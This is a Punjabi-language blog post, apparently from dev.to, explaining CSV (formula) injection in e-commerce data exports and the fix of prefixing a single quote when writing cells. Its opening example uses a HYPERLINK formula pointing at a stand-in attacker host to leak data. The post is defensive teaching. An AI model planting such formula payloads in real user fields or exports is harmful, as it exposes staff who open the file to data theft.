CSV ਇੰਜੈਕਸ਼ਨ: ਉਹ ਐਕਸਪੋਰਟ ਬਟਨ ਜੋ ਕੋਡ ਚਲਾਉਂਦਾ ਹੈ

ਇੱਕ ਗਾਹਕ ਆਪਣਾ ਨਾਮ ਦਰਜ ਕਰਦਾ ਹੈ। ਉਹ ਟਾਈਪ ਕਰਦੇ ਹਨ =HYPERLINK("http://evil.example/leak", "click")। ਤੁਹਾਡਾ ਸਿਸਟਮ ਇਸਨੂੰ ਸਵੀਕਾਰ ਕਰ ਲੈਂਦਾ ਹੈ। ਇਹ ਸਾਧਾਰਨ ਟੈਕਸਟ ਵਾਂਗ ਦਿਖਾਈ ਦਿੰਦਾ ਹੈ।

ਹਫ਼ਤਿਆਂ ਬਾਅਦ, ਤੁਹਾਡੀ ਫਾਈਨੈਂਸ ਟੀਮ ਗਾਹਕਾਂ ਦੀ ਸੂਚੀ ਨੂੰ CSV ਵਿੱਚ ਐਕਸਪੋਰਟ ਕਰਦੀ ਹੈ। ਉਹ ਐਕਸਲ (Excel) ਵਿੱਚ ਫਾਈਲ ਖੋਲ੍ਹਦੇ ਹਨ। ਉਹ ਸੈੱਲ ਹੁਣ ਟੈਕਸਟ ਨਹੀਂ ਰਿਹਾ। ਇਹ ਇੱਕ ਫਾਰਮੂਲਾ ਹੈ।

ਇਹ CSV ਇੰਜੈਕਸ਼ਨ ਹੈ। ਲੋਕ ਇਸਨੂੰ ਫਾਰਮੂਲਾ ਇੰਜੈਕਸ਼ਨ ਵੀ ਕਹਿੰਦੇ ਹਨ। ਇਹ ਈ-ਕਾਮਰਸ ਪੈਨਲਾਂ ਵਿੱਚ ਇੱਕ ਆਮ ਬੱਗ ਹੈ। ਜ਼ਿਆਦਾਤਰ ਟੀਮਾਂ ਇਸਦੀ ਜਾਂਚ ਨਹੀਂ ਕਰਦੀਆਂ।

ਸਪ੍ਰੈਡਸ਼ੀਟ ਐਪਸ ਹਰ ਸੈੱਲ ਨੂੰ ਟੈਕਸਟ ਵਜੋਂ ਨਹੀਂ ਮੰਨਦੀਆਂ। ਜੇਕਰ ਕੋਈ ਸੈੱਲ =, +, -, ਜਾਂ @ ਨਾਲ ਸ਼ੁਰੂ ਹੁੰਦਾ ਹੈ, ਤਾਂ Excel ਜਾਂ Google Sheets ਇਸਨੂੰ ਇੱਕ ਫਾਰਮੂਲੇ ਵਜੋਂ ਪੜ੍ਹਦਾ ਹੈ।

ਇੱਕ ਫਾਰਮੂਲਾ ਗਣਿਤ ਤੋਂ ਵੱਧ ਕੁਝ ਕਰ ਸਕਦਾ ਹੈ। ਇਹ ਇੱਕ URL ਬਣਾ ਸਕਦਾ ਹੈ। ਇਹ ਕਿਸੇ ਨੈੱਟਵਰਕ ਨਾਲ ਸੰਪਰਕ ਕਰ ਸਕਦਾ ਹੈ। ਕੁਝ ਮਾਮਲਿਆਂ ਵਿੱਚ, ਇਹ ਕੰਪਿਊਟਰ 'ਤੇ ਕਮਾਂਡਾਂ ਚਲਾ ਸਕਦਾ ਹੈ।

ਡੇਟਾ ਤੁਹਾਡੇ ਡੇਟਾਬੇਸ ਵਿੱਚ ਟੈਕਸਟ ਵਜੋਂ ਰਹਿੰਦਾ ਹੈ। ਜਿਵੇਂ ਹੀ ਕੋਈ ਇਨਸਾਨ ਫਾਈਲ ਖੋਲ੍ਹਦਾ ਹੈ, ਇਹ ਐਗਜ਼ੀਕਿਊਟੇਬਲ ਬਣ ਜਾਂਦਾ ਹੈ। ਆਮ ਤੌਰ 'ਤੇ, ਪੀੜਤ ਉਹ ਸਟਾਫ ਮੈਂਬਰ ਹੁੰਦਾ ਹੈ ਜਿਸ ਕੋਲ ਉੱਚ ਪੱਧਰੀ ਐਕਸੈਸ ਹੁੰਦੀ ਹੈ।

ਤੁਸੀਂ ਉੱਥੇ ਜੋਖਮ ਵਿੱਚ ਹੋ ਜਿੱਥੇ ਵੀ ਤੁਸੀਂ ਯੂਜ਼ਰ ਡੇਟਾ ਐਕਸਪੋਰਟ ਕਰਦੇ ਹੋ:

  • ਗਾਹਕ ਦੇ ਨਾਮ ਅਤੇ ਪਤੇ ਦੇ ਐਕਸਪੋਰਟ
  • CSV ਵਿੱਚ ਐਕਸਪੋਰਟ ਕੀਤੇ ਗਏ ਆਰਡਰ ਗ੍ਰਿਡ
  • ਵੈਂਡਰਾਂ ਤੋਂ ਪ੍ਰੋਡਕਟ ਫੀਡ
  • ਕੰਟੈਕਟ ਫਾਰਮ ਡੰਪਸ

ਇੱਕ ਹਮਲਾਵਰ ਨੂੰ ਐਡਮਿਨ ਐਕਸੈਸ ਦੀ ਲੋੜ ਨਹੀਂ ਹੁੰਦੀ। ਉਹ ਆਪਣਾ ਨਾਮ ਇੱਕ ਫਾਰਮੂਲੇ ਵਜੋਂ ਸੈੱਟ ਕਰਦੇ ਹਨ ਅਤੇ ਇੰਤਜ਼ਾਰ ਕਰਦੇ ਹਨ।

ਇਸਨੂੰ ਇਨਪੁਟ ਵੈਲੀਡੇਸ਼ਨ ਦੌਰਾਨ ਠੀਕ ਕਰਨ ਦੀ ਕੋਸ਼ਿਸ਼ ਨਾ ਕਰੋ। ਜਦੋਂ ਤੱਕ ਸਪ੍ਰੈਡਸ਼ੀਟ ਇਸਨੂੰ ਨਹੀਂ ਪੜ੍ਹਦੀ, ਉਦੋਂ ਤੱਕ ਇਹ ਮੁੱਲ ਜਾਇਜ਼ ਟੈਕਸਟ ਹੁੰਦਾ ਹੈ। ਇਸ ਦੀ ਬਜਾਏ, ਜਦੋਂ ਤੁਸੀਂ CSV ਫਾਈਲ ਲਿਖਦੇ ਹੋ ਤਾਂ ਡੇਟਾ ਨੂੰ ਸੈਨੀਟਾਈਜ਼ ਕਰੋ।

ਜੇਕਰ ਕੋਈ ਸੈੱਲ =, +, -, @, ਇੱਕ ਟੈਬ, ਜਾਂ ਕੈਰੇਜ ਰਿਟਰਨ ਨਾਲ ਸ਼ੁਰੂ ਹੁੰਦਾ ਹੈ, ਤਾਂ ਅੱਗੇ ਇੱਕ ਸਿੰਗਲ ਕੋਟ (') ਲਗਾਓ।

ਉਦਾਹਰਨ ਲੌਜਿਕ: ਜੇਕਰ ਮੁੱਲ ਕਿਸੇ ਟ੍ਰਿਗਰ ਕੈਰੇਕਟਰ ਨਾਲ ਸ਼ੁਰੂ ਹੁੰਦਾ ਹੈ, ਤਾਂ "'" + value ਰਿਟਰਨ ਕਰੋ।

ਸਿੰਗਲ ਕੋਟ ਸਪ੍ਰੈਡਸ਼ੀਟ ਨੂੰ ਸੈੱਲ ਨੂੰ ਟੈਕਸਟ ਵਜੋਂ ਮੰਨਣ ਲਈ ਕਹਿੰਦਾ ਹੈ। ਸਪ੍ਰੈਡਸ਼ੀਟ ਯੂਜ਼ਰ ਤੋਂ ਕੋਟ ਨੂੰ ਲੁਕਾ ਦਿੰਦੀ ਹੈ। ਫਾਈਲ ਵਿੱਚ ਜਾਣ ਤੋਂ ਪਹਿਲਾਂ ਹਰ ਫੀਲਡ ਨੂੰ ਇਸ ਚੈੱਕ ਰਾਹੀਂ ਲੰਘਾਓ।

ਆਪਣੇ ਡੇਟਾਬੇਸ ਵਿੱਚ ਡੇਟਾ ਨੂੰ ਐਸਕੇਪ ਨਾ ਕਰੋ। ਮੁੱਲ ਤੁਹਾਡੇ ਡੇਟਾਬੇਸ ਵਿੱਚ ਠੀਕ ਹੈ ਅਤੇ ਤੁਹਾਡੇ HTML ਵਿੱਚ ਵੀ ਠੀਕ ਹੈ। ਇਹ ਸਿਰਫ਼ CSV ਵਿੱਚ ਖ਼ਤਰਨਾਕ ਹੈ। ਆਪਣੇ ਡੇਟਾ ਨੂੰ ਹੋਰ ਕਿਤੇ ਸਾਫ਼ ਰੱਖਣ ਲਈ CSV ਦੀ ਸੀਮਾ ਦੀ ਰੱਖਿਆ ਕਰੋ।

ਆਪਣੇ ਅੰਦਰੂਨੀ ਐਕਸਪੋਰਟਸ 'ਤੇ ਭਰੋਸਾ ਕਰਨਾ ਬੰਦ ਕਰੋ। ਹਮਲਾਵਰ ਇਹਨਾਂ ਫਾਈਲਾਂ ਰਾਹੀਂ ਤੁਹਾਡੇ ਸਟਾਫ ਨੂੰ ਨਿਸ਼ਾਨਾ ਬਣਾਉਂਦੇ ਹਨ।

CSV ਇੰਜੈਕਸ਼ਨ ਡਰਾਉਣੇ ਸਕੈਨਰ ਅਲਰਟ ਨਹੀਂ ਦਿੰਦਾ। ਇਹ ਉਸ ਐਕਸਪੋਰਟ ਬਟਨ ਵਿੱਚ ਲੁਕਿਆ ਹੁੰਦਾ ਹੈ ਜੋ ਤੁਸੀਂ ਸਾਲਾਂ ਪਹਿਲਾਂ ਬਣਾਇਆ ਸੀ। ਹੁਣੇ ਆਪਣੇ CSV ਐਕਸਪੋਰਟ ਕੋਡ ਦੀ ਜਾਂਚ ਕਰੋ। ਜੇਕਰ ਤੁਸੀਂ ਹਰ ਸੈੱਲ ਦੇ ਪਹਿਲੇ ਅੱਖਰ ਦੀ ਰੱਖਿਆ ਨਹੀਂ ਕਰਦੇ, ਤਾਂ ਤੁਸੀਂ ਜੋਖਮ ਵਿੱਚ ਹੋ।

ਸਰੋਤ: https://dev.to/iamrobindhiman/csv-injection-the-export-button-that-runs-code-on-someone-elses-machine-3ki6